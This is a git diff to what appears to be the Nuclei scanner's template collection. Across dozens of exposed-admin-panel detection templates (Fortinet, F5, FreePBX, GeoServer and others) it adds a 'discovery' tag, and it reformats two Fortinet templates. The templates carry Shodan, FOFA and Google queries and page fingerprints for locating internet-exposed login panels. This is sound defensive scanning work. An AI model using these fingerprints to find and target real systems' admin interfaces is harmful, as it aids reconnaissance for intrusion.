login,panel,withsecure,discovery http: - method: GET diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index 09489086035..9ce6fa4d04f 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"BIG-IP Configuration Utility" - tags: f5,admin,detect,panel,login + tags: f5,admin,detect,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/falcosidekick-panel.yaml b/http/exposed-panels/falcosidekick-panel.yaml index 91348a4f641..8384937c4c2 100644 --- a/http/exposed-panels/falcosidekick-panel.yaml +++ b/http/exposed-panels/falcosidekick-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Falcosidekick" - tags: panel,falco,detect,login + tags: panel,falco,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/faraday-login.yaml b/http/exposed-panels/faraday-login.yaml index 2efe0c61931..cd39437c493 100644 --- a/http/exposed-panels/faraday-login.yaml +++ b/http/exposed-panels/faraday-login.yaml @@ -14,7 +14,7 @@ info: shodan-query: html:"faradayApp" product: faraday vendor: faraday_project - tags: panel,faraday + tags: panel,faraday,discovery http: - method: GET diff --git a/http/exposed-panels/fastapi-docs.yaml b/http/exposed-panels/fastapi-docs.yaml index 20f15acc5c0..c5917d43adb 100644 --- a/http/exposed-panels/fastapi-docs.yaml +++ b/http/exposed-panels/fastapi-docs.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: fastapi,tech,panel + tags: fastapi,tech,panel,discovery http: - method: GET diff --git a/http/exposed-panels/fastpanel-hosting-control-panel.yaml b/http/exposed-panels/fastpanel-hosting-control-panel.yaml index e3f72cfaea0..9c00b5bc064 100644 --- a/http/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/http/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"FASTPANEL HOSTING CONTROL" - tags: panel,fastpanel + tags: panel,fastpanel,discovery http: - method: GET diff --git a/http/exposed-panels/fatpipe-ipvpn-panel.yaml b/http/exposed-panels/fatpipe-ipvpn-panel.yaml index d5590d356e5..07222576a57 100644 --- a/http/exposed-panels/fatpipe-ipvpn-panel.yaml +++ b/http/exposed-panels/fatpipe-ipvpn-panel.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,ipvpn,fatpipe + tags: panel,ipvpn,fatpipe,discovery http: - method: GET diff --git a/http/exposed-panels/fatpipe-mpvpn-panel.yaml b/http/exposed-panels/fatpipe-mpvpn-panel.yaml index c00c79b16a6..fa85b97cca6 100644 --- a/http/exposed-panels/fatpipe-mpvpn-panel.yaml +++ b/http/exposed-panels/fatpipe-mpvpn-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,fatpipe,panel + tags: tech,fatpipe,panel,discovery http: - method: GET diff --git a/http/exposed-panels/fatpipe-warp-panel.yaml b/http/exposed-panels/fatpipe-warp-panel.yaml index 2780d8cbc36..5173ca13001 100644 --- a/http/exposed-panels/fatpipe-warp-panel.yaml +++ b/http/exposed-panels/fatpipe-warp-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,fatpipe,panel + tags: tech,fatpipe,panel,discovery http: - method: GET diff --git a/http/exposed-panels/femtocell-panel.yaml b/http/exposed-panels/femtocell-panel.yaml index ee2af98ab3b..3634d582e94 100644 --- a/http/exposed-panels/femtocell-panel.yaml +++ b/http/exposed-panels/femtocell-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"Femtocell Access Point" - tags: femtocell,network,panel,login + tags: femtocell,network,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/filebrowser-login-panel.yaml b/http/exposed-panels/filebrowser-login-panel.yaml index 2884268ef17..f29490b0c04 100644 --- a/http/exposed-panels/filebrowser-login-panel.yaml +++ b/http/exposed-panels/filebrowser-login-panel.yaml @@ -15,7 +15,7 @@ info: product: filebrowser shodan-query: http.favicon.hash:1052926265 fofa-query: icon_hash=1052926265 - tags: panel,filebrowser,detect + tags: panel,filebrowser,detect,discovery http: - method: GET diff --git a/http/exposed-panels/filecatalyst-panel.yaml b/http/exposed-panels/filecatalyst-panel.yaml index 8da3e389f42..f852e0aad19 100644 --- a/http/exposed-panels/filecatalyst-panel.yaml +++ b/http/exposed-panels/filecatalyst-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"FileCatalyst file transfer solution" - tags: panel,login,filecatalyst,detect + tags: panel,login,filecatalyst,detect,discovery http: - method: GET diff --git a/http/exposed-panels/filegator-panel.yaml b/http/exposed-panels/filegator-panel.yaml index 0d5ac1bf091..e0f499a3751 100644 --- a/http/exposed-panels/filegator-panel.yaml +++ b/http/exposed-panels/filegator-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: title:"FileGator" - tags: filegator,panel,login,detect + tags: filegator,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/fiori-launchpad.yaml b/http/exposed-panels/fiori-launchpad.yaml index 7342a36c5bf..55c3b61b095 100644 --- a/http/exposed-panels/fiori-launchpad.yaml +++ b/http/exposed-panels/fiori-launchpad.yaml @@ -19,7 +19,7 @@ info: google-query: - sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com - sap/bc/ui5_ui5/ui2/ushell/shells/abap/fiorilaunchpad.html -site:sap.com - tags: sap,fiori,edb,panel + tags: sap,fiori,edb,panel,discovery http: - method: GET diff --git a/http/exposed-panels/fiorilaunchpad-logon.yaml b/http/exposed-panels/fiorilaunchpad-logon.yaml index f000c647258..bf3c854cbe2 100644 --- a/http/exposed-panels/fiorilaunchpad-logon.yaml +++ b/http/exposed-panels/fiorilaunchpad-logon.yaml @@ -16,7 +16,7 @@ info: vendor: sap product: fiori_launchpad google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/fiorilaunchpad.html -site:sap.com - tags: panel,edb,sap + tags: panel,edb,sap,discovery http: - method: GET diff --git a/http/exposed-panels/fireware-xtm-user-authentication.yaml b/http/exposed-panels/fireware-xtm-user-authentication.yaml index 646b2d91756..7e2f20e30b9 100644 --- a/http/exposed-panels/fireware-xtm-user-authentication.yaml +++ b/http/exposed-panels/fireware-xtm-user-authentication.yaml @@ -18,7 +18,7 @@ info: - http.title:"fireware xtm user authentication" fofa-query: title="fireware xtm user authentication" google-query: intitle:"fireware xtm user authentication" - tags: panel,watchguard + tags: panel,watchguard,discovery http: - method: GET diff --git a/http/exposed-panels/flahscookie-superadmin-panel.yaml b/http/exposed-panels/flahscookie-superadmin-panel.yaml index fe2dfb39a7c..c915cca02b6 100644 --- a/http/exposed-panels/flahscookie-superadmin-panel.yaml +++ b/http/exposed-panels/flahscookie-superadmin-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Flahscookie Superadmin" - tags: panel,flahscookie,superadmin + tags: panel,flahscookie,superadmin,discovery http: - method: GET diff --git a/http/exposed-panels/flightpath-panel.yaml b/http/exposed-panels/flightpath-panel.yaml index 3ad5ee055e5..74f8c69a6e4 100644 --- a/http/exposed-panels/flightpath-panel.yaml +++ b/http/exposed-panels/flightpath-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"flightpath" - tags: panel,flightpath + tags: panel,flightpath,discovery http: - method: GET diff --git a/http/exposed-panels/flink-exposure.yaml b/http/exposed-panels/flink-exposure.yaml index 423db44254a..e4a2031a043 100644 --- a/http/exposed-panels/flink-exposure.yaml +++ b/http/exposed-panels/flink-exposure.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: apache product: flink - tags: panel,apache,flink + tags: panel,apache,flink,discovery http: - method: GET diff --git a/http/exposed-panels/flip-cms-panel.yaml b/http/exposed-panels/flip-cms-panel.yaml index 887b1eb2be4..6609a38c428 100644 --- a/http/exposed-panels/flip-cms-panel.yaml +++ b/http/exposed-panels/flip-cms-panel.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,flip,cms + tags: panel,flip,cms,discovery http: - method: GET diff --git a/http/exposed-panels/flowci-panel.yaml b/http/exposed-panels/flowci-panel.yaml index 7ded44d2269..292d0c4125b 100644 --- a/http/exposed-panels/flowci-panel.yaml +++ b/http/exposed-panels/flowci-panel.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,flowci + tags: panel,flowci,discovery http: - method: GET diff --git a/http/exposed-panels/flureedb-admin-console.yaml b/http/exposed-panels/flureedb-admin-console.yaml index ab6bd585dcf..5250ce0c5b8 100644 --- a/http/exposed-panels/flureedb-admin-console.yaml +++ b/http/exposed-panels/flureedb-admin-console.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"FlureeDB Admin Console" - tags: panel,flureedb + tags: panel,flureedb,discovery http: - method: GET diff --git a/http/exposed-panels/footprints-panel.yaml b/http/exposed-panels/footprints-panel.yaml index f978865edf0..bd9d183b692 100644 --- a/http/exposed-panels/footprints-panel.yaml +++ b/http/exposed-panels/footprints-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"FootPrints Service Core Login" product: footprints_service_core vendor: bmc - tags: tech,panel,footprints + tags: tech,panel,footprints,discovery http: - method: GET diff --git a/http/exposed-panels/forcepoint-applicance.yaml b/http/exposed-panels/forcepoint-applicance.yaml index cb7391c59a2..a0a4f6fee92 100644 --- a/http/exposed-panels/forcepoint-applicance.yaml +++ b/http/exposed-panels/forcepoint-applicance.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Forcepoint Appliance" - tags: panel,forcepoint + tags: panel,forcepoint,discovery http: - method: GET diff --git a/http/exposed-panels/forcepoint.yaml b/http/exposed-panels/forcepoint.yaml index 596b2e9c8fb..281d81f3521 100644 --- a/http/exposed-panels/forcepoint.yaml +++ b/http/exposed-panels/forcepoint.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: forcepoint product: email_security - tags: forcepoint,panel,login + tags: forcepoint,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/forgerock-ig-panel.yaml b/http/exposed-panels/forgerock-ig-panel.yaml index 8ed97b16a42..cc5793a439e 100644 --- a/http/exposed-panels/forgerock-ig-panel.yaml +++ b/http/exposed-panels/forgerock-ig-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 fofa-query: body="ForgeRock Identity Platform" shodan-query: html:"ForgeRock Identity Platform" - tags: forgerock,ig,login,identity-gateway,detect + tags: forgerock,ig,login,identity-gateway,detect,discovery http: - method: GET diff --git a/http/exposed-panels/forti/fortiadc-panel.yaml b/http/exposed-panels/forti/fortiadc-panel.yaml index d284e4d3fb8..fd32229bb96 100644 --- a/http/exposed-panels/forti/fortiadc-panel.yaml +++ b/http/exposed-panels/forti/fortiadc-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"fortiadc" fofa-query: title="fortiadc" google-query: intitle:"fortiadc" - tags: panel,fortinet + tags: panel,fortinet,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml index 5adfcd79943..c7c4936b43d 100644 --- a/http/exposed-panels/fortinet/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -17,7 +17,7 @@ info: max-request: 1 vendor: f5 product: big-ip - tags: panel,fortinet,login,f5 + tags: panel,fortinet,login,f5,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortiap-panel.yaml b/http/exposed-panels/fortinet/fortiap-panel.yaml index ab26806d852..78f9b03092d 100644 --- a/http/exposed-panels/fortinet/fortiap-panel.yaml +++ b/http/exposed-panels/fortinet/fortiap-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"fortiap" fofa-query: title="fortiap" google-query: intitle:"fortiap" - tags: panel,fortinet,fortiap + tags: panel,fortinet,fortiap,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml b/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml index eb26c7908e2..49081bc80ea 100644 --- a/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml +++ b/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml @@ -16,7 +16,7 @@ info: product: fortiauthenticator shodan-query: http.favicon.hash:-1653412201 fofa-query: icon_hash=-1653412201 - tags: panel,fortinet,fortiauthenticator,detect + tags: panel,fortinet,fortiauthenticator,detect,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/forticlientems-panel.yaml b/http/exposed-panels/fortinet/forticlientems-panel.yaml index 8cc6c024699..610c3242458 100644 --- a/http/exposed-panels/fortinet/forticlientems-panel.yaml +++ b/http/exposed-panels/fortinet/forticlientems-panel.yaml @@ -12,7 +12,7 @@ info: vendor: fortinet product: forticlient_endpoint_management_server shodan-query: http.favicon.hash:-800551065 - tags: panel,fortinet,forticlient,ems,login,detect + tags: panel,fortinet,forticlient,ems,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortimail-panel.yaml b/http/exposed-panels/fortinet/fortimail-panel.yaml index 49740e00f9b..f4f87910ada 100644 --- a/http/exposed-panels/fortinet/fortimail-panel.yaml +++ b/http/exposed-panels/fortinet/fortimail-panel.yaml @@ -21,7 +21,7 @@ info: - fortimail && port=443 - title="fortimail" google-query: intitle:"fortimail" - tags: panel,fortinet,fortimail,login + tags: panel,fortinet,fortimail,login,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml index 2998ef5dde2..4eab28319e6 100644 --- a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"fortiddos" fofa-query: title="fortiddos" google-query: intitle:"fortiddos" - tags: panel,fortinet,fortiddos,login + tags: panel,fortinet,fortiddos,login,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml index fc005e89a5f..7da72dcc3ab 100644 --- a/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml @@ -11,7 +11,7 @@ info: shodan-query: - cpe:"cpe:2.3:o:fortinet:fortios" - http.html_hash:-1454941180 - tags: panel,fortigate,vpn + tags: panel,fortigate,vpn,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml index 5fe21e06393..c53b61cb61a 100644 --- a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml @@ -18,7 +18,7 @@ info: product: fortimanager shodan-query: 'http.html_hash:-1527157728 "Model: FMG-VM"' fofa-query: title="FortiManager-" - tags: panel,fortinet,fortios,fortimanager,detect + tags: panel,fortinet,fortios,fortimanager,detect,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml index a2b452a4f7f..ed0ba5a7629 100644 --- a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"fortinac" fofa-query: title="fortinac" google-query: intitle:"fortinac" - tags: panel,fortinet,fortinac,login + tags: panel,fortinet,fortinac,login,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortinet-panel.yaml b/http/exposed-panels/fortinet/fortinet-panel.yaml index 0cf1894a7bf..7ca19d167df 100644 --- a/http/exposed-panels/fortinet/fortinet-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"FORTINET LOGIN" product: fortiportal vendor: fortinet - tags: panel,fortinet,login,detect + tags: panel,fortinet,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortios-management-panel.yaml b/http/exposed-panels/fortinet/fortios-management-panel.yaml index 742de6e0896..26888e8dbf7 100644 --- a/http/exposed-panels/fortinet/fortios-management-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-management-panel.yaml @@ -22,7 +22,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: panel,fortinet,fortios,fortigate,fortiproxy,fortiap + tags: panel,fortinet,fortios,fortigate,fortiproxy,fortiap,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortios-panel.yaml b/http/exposed-panels/fortinet/fortios-panel.yaml index 5a028f1cb44..b3b9c3178d4 100644 --- a/http/exposed-panels/fortinet/fortios-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-panel.yaml @@ -25,7 +25,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash=945408572 - tags: panel,fortinet,fortios + tags: panel,fortinet,fortios,discovery http: - raw: diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml index e1c1d953bbd..09dbb50ce17 100644 --- a/http/exposed-panels/fortinet/fortisiem-panel.yaml +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -19,7 +19,7 @@ info: fofa-query: - icon_hash="-1341442175" - body="var hst = location.hostname" - tags: panel,fortinet,login + tags: panel,fortinet,login,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortitester-login-panel.yaml b/http/exposed-panels/fortinet/fortitester-login-panel.yaml index d5df0deb040..6e7be76c6f5 100644 --- a/http/exposed-panels/fortinet/fortitester-login-panel.yaml +++ b/http/exposed-panels/fortinet/fortitester-login-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"fortitester" fofa-query: title="fortitester" google-query: intitle:"fortitester" - tags: panel,fortinet + tags: panel,fortinet,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index c5e38915f11..e9ddf9fd584 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"fortiweb - " fofa-query: title="fortiweb - " google-query: intitle:"fortiweb - " - tags: panel,fortinet,fortiweb,login + tags: panel,fortinet,fortiweb,login,discovery http: - method: GET diff --git a/http/exposed-panels/fortinet/fortiwlm-panel.yaml b/http/exposed-panels/fortinet/fortiwlm-panel.yaml index 11f00f433c8..c1bb52ab876 100644 --- a/http/exposed-panels/fortinet/fortiwlm-panel.yaml +++ b/http/exposed-panels/fortinet/fortiwlm-panel.yaml @@ -24,7 +24,7 @@ info: - title="fortiwlm" - body="fortiwlm" google-query: intitle:"fortiwlm" - tags: panel,fortinet,fortiwlm,login + tags: panel,fortinet,fortiwlm,login,discovery http: - method: GET diff --git a/http/exposed-panels/fortirecorder-panel.yaml b/http/exposed-panels/fortirecorder-panel.yaml index bc44e90182c..ae22c7a1a74 100644 --- a/http/exposed-panels/fortirecorder-panel.yaml +++ b/http/exposed-panels/fortirecorder-panel.yaml @@ -1,34 +1,34 @@ -id: fortirecorder-panel - -info: - name: FortiRecorder Panel - Detect - author: rxerium - severity: info - description: | - FortiRecorder Panel was discovered. - reference: - - https://www.fortinet.com/content/dam/fortinet/assets/data-sheets/FortiRecorder.pdf - metadata: - max-request: 1 - verified: true - shodan-query: title:FortiRecorder - fofa-query: title="FortiRecorder" - tags: fortinet,fortirecorder,login,panel - -http: - - method: GET - path: - - "{{BaseURL}}/admin/" - - matchers-condition: and - matchers: - - type: word - words: - - "FortiRecorder Admin" - - "Log In" - condition: and - - - type: status - status: +id: fortirecorder-panel + +info: + name: FortiRecorder Panel - Detect + author: rxerium + severity: info + description: | + FortiRecorder Panel was discovered. + reference: + - https://www.fortinet.com/content/dam/fortinet/assets/data-sheets/FortiRecorder.pdf + metadata: + max-request: 1 + verified: true + shodan-query: title:FortiRecorder + fofa-query: title="FortiRecorder" + tags: fortinet,fortirecorder,login,panel,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/admin/" + + matchers-condition: and + matchers: + - type: word + words: + - "FortiRecorder Admin" + - "Log In" + condition: and + + - type: status + status: - 200 # digest: 4b0a00483046022100a639ffa4121e39e11754a2c52ef13b29a75c7306fe87cca6a41461c4947cfaf502210086cc8452aadf0c72fe1feec2292e6931d4d677fa71ed17bb7dafd08b2c04e0d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/fortiswitch-panel.yaml b/http/exposed-panels/fortiswitch-panel.yaml index 0f5e6380c70..f076e73682e 100644 --- a/http/exposed-panels/fortiswitch-panel.yaml +++ b/http/exposed-panels/fortiswitch-panel.yaml @@ -1,32 +1,32 @@ -id: fortiswitch-panel - -info: - name: Fortiswitch Panel - Detect - author: rxerium - severity: info - description: | - Fortiswitch panel was detected. - metadata: - verified: true - max-request: 1 - vendor: fortinet - product: fortiswitch - fofa-query: app="FortiSwitch" - tags: login,panel,fortiswitch - -http: - - method: GET - path: - - '{{BaseURL}}/login' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "FortiSwitch" - - - type: status - status: +id: fortiswitch-panel + +info: + name: Fortiswitch Panel - Detect + author: rxerium + severity: info + description: | + Fortiswitch panel was detected. + metadata: + verified: true + max-request: 1 + vendor: fortinet + product: fortiswitch + fofa-query: app="FortiSwitch" + tags: login,panel,fortiswitch,discovery + +http: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>FortiSwitch" + + - type: status + status: - 200 # digest: 490a004630440220759b9fe34bc6a77892f449d9d6abfd770b39e7609a1ff06092494a3b6def697c022002eeed911d2dec369299ceca2359629758c7c101506237d200e9d2e7ff9efb1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/fossbilling-panel.yaml b/http/exposed-panels/fossbilling-panel.yaml index 1e15c2a6ef9..b22d2639ae6 100644 --- a/http/exposed-panels/fossbilling-panel.yaml +++ b/http/exposed-panels/fossbilling-panel.yaml @@ -14,7 +14,7 @@ info: vendor: fossbilling product: fossbilling shodan-query: title:"FOSSBilling" - tags: fossbilling,panel,detect + tags: fossbilling,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/frappe-helpdesk-panel.yaml b/http/exposed-panels/frappe-helpdesk-panel.yaml index 91f7094c746..4bf4ed60cfc 100644 --- a/http/exposed-panels/frappe-helpdesk-panel.yaml +++ b/http/exposed-panels/frappe-helpdesk-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"window.frappe_version" - tags: panel,frappe,login + tags: panel,frappe,login,discovery http: - method: GET diff --git a/http/exposed-panels/frappe-panel.yaml b/http/exposed-panels/frappe-panel.yaml index 02cb1012a84..b5725258f7e 100644 --- a/http/exposed-panels/frappe-panel.yaml +++ b/http/exposed-panels/frappe-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Login to Frappe" - tags: frappe,login,web,erp,detect + tags: frappe,login,web,erp,detect,discovery http: - method: GET diff --git a/http/exposed-panels/freeipa-panel.yaml b/http/exposed-panels/freeipa-panel.yaml index e251de47737..1d67b103f01 100644 --- a/http/exposed-panels/freeipa-panel.yaml +++ b/http/exposed-panels/freeipa-panel.yaml @@ -18,7 +18,7 @@ info: - html:"FreeIPA" - http.html:"freeipa" fofa-query: body="freeipa" - tags: panel,login,freeipa + tags: panel,login,freeipa,discovery http: - method: GET diff --git a/http/exposed-panels/freepbx-administration-panel.yaml b/http/exposed-panels/freepbx-administration-panel.yaml index a0cdfe0aef9..b4d2c9e9a0f 100644 --- a/http/exposed-panels/freepbx-administration-panel.yaml +++ b/http/exposed-panels/freepbx-administration-panel.yaml @@ -23,7 +23,7 @@ info: - title="FreePBX" - icon_hash="-1908328911" - icon_hash="1574423538" - tags: freepbx,panel,sangoma + tags: freepbx,panel,sangoma,discovery http: - method: GET diff --git a/http/exposed-panels/freescout-panel.yaml b/http/exposed-panels/freescout-panel.yaml index 7fdb18090aa..4bc1bbe423a 100644 --- a/http/exposed-panels/freescout-panel.yaml +++ b/http/exposed-panels/freescout-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: app="FreeScout" - tags: panel,login,freescout,detect + tags: panel,login,freescout,detect,discovery http: - method: GET diff --git a/http/exposed-panels/freshrss-panel.yaml b/http/exposed-panels/freshrss-panel.yaml index 2459d2f7658..613bf811d28 100644 --- a/http/exposed-panels/freshrss-panel.yaml +++ b/http/exposed-panels/freshrss-panel.yaml @@ -14,7 +14,7 @@ info: vendor: freshrss product: freshrss shodan-query: title:"Freshrss" - tags: freshrss,panel,detect + tags: freshrss,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/friendica-panel.yaml b/http/exposed-panels/friendica-panel.yaml index 82b2df4cb05..b0d3d27ccd1 100644 --- a/http/exposed-panels/friendica-panel.yaml +++ b/http/exposed-panels/friendica-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"friendica" fofa-query: title="friendica" google-query: intitle:"friendica" - tags: friendica,panel,login,detect + tags: friendica,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/froxlor-management-panel.yaml b/http/exposed-panels/froxlor-management-panel.yaml index 40680eff774..a6095f6e7ae 100644 --- a/http/exposed-panels/froxlor-management-panel.yaml +++ b/http/exposed-panels/froxlor-management-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"froxlor server management panel" fofa-query: title="froxlor server management panel" google-query: intitle:"froxlor server management panel" - tags: panel,froxlor + tags: panel,froxlor,discovery http: - method: GET diff --git a/http/exposed-panels/ftm-manager-panel.yaml b/http/exposed-panels/ftm-manager-panel.yaml index 9b72647360e..9442debc874 100644 --- a/http/exposed-panels/ftm-manager-panel.yaml +++ b/http/exposed-panels/ftm-manager-panel.yaml @@ -24,7 +24,7 @@ info: fofa-query: - title="ftm manager" - body="ftm manager" - tags: panel,ftm,ibm + tags: panel,ftm,ibm,discovery http: - method: GET diff --git a/http/exposed-panels/fuelcms-panel.yaml b/http/exposed-panels/fuelcms-panel.yaml index f55e137fd8f..2348cdbf108 100644 --- a/http/exposed-panels/fuelcms-panel.yaml +++ b/http/exposed-panels/fuelcms-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"fuel cms" fofa-query: title="fuel cms" google-query: intitle:"fuel cms" - tags: panel,fuelcms,oss,daylightstudio + tags: panel,fuelcms,oss,daylightstudio,discovery http: - method: GET diff --git a/http/exposed-panels/fuji-xerox-printer-detect.yaml b/http/exposed-panels/fuji-xerox-printer-detect.yaml index 2a1b9452452..0565bd24900 100644 --- a/http/exposed-panels/fuji-xerox-printer-detect.yaml +++ b/http/exposed-panels/fuji-xerox-printer-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Fuji Xerox Co., Ltd" - tags: iot,panel,fuji,printer + tags: iot,panel,fuji,printer,discovery http: - method: GET diff --git a/http/exposed-panels/fusionauth-admin-panel.yaml b/http/exposed-panels/fusionauth-admin-panel.yaml index 47c957de7f2..2ddb3178799 100644 --- a/http/exposed-panels/fusionauth-admin-panel.yaml +++ b/http/exposed-panels/fusionauth-admin-panel.yaml @@ -16,7 +16,7 @@ info: - http.title:"fusionauth" fofa-query: title="fusionauth" google-query: intitle:"fusionauth" - tags: panel,fusionauth,detect,login + tags: panel,fusionauth,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/gargoyle-router.yaml b/http/exposed-panels/gargoyle-router.yaml index 98460c01826..754655ed735 100644 --- a/http/exposed-panels/gargoyle-router.yaml +++ b/http/exposed-panels/gargoyle-router.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"Gargoyle Router Management Utility" product: gargoyle vendor: gargoyle-router - tags: panel,iot,gargoyle,router,edb + tags: panel,iot,gargoyle,router,edb,discovery http: - method: GET diff --git a/http/exposed-panels/genweb-plus-panel.yaml b/http/exposed-panels/genweb-plus-panel.yaml index 5b7891baf54..648383f75db 100644 --- a/http/exposed-panels/genweb-plus-panel.yaml +++ b/http/exposed-panels/genweb-plus-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,gemweb + tags: panel,gemweb,discovery http: - method: GET diff --git a/http/exposed-panels/geoserver-login-panel.yaml b/http/exposed-panels/geoserver-login-panel.yaml index 3857c7f067a..42372c235e6 100644 --- a/http/exposed-panels/geoserver-login-panel.yaml +++ b/http/exposed-panels/geoserver-login-panel.yaml @@ -21,7 +21,7 @@ info: - app="geoserver" - title="geoserver" google-query: intitle:"geoserver" - tags: panel,geoserver,osgeo + tags: panel,geoserver,osgeo,discovery http: - method: GET diff --git a/http/exposed-panels/gerapy-detect.yaml b/http/exposed-panels/gerapy-detect.yaml index 064adb87bd9..332fcf2d937 100644 --- a/http/exposed-panels/gerapy-detect.yaml +++ b/http/exposed-panels/gerapy-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: gerapy product: gerapy - tags: tech,gerapy,panel + tags: tech,gerapy,panel,discovery http: - method: GET diff --git a/http/exposed-panels/gespage-panel.yaml b/http/exposed-panels/gespage-panel.yaml index 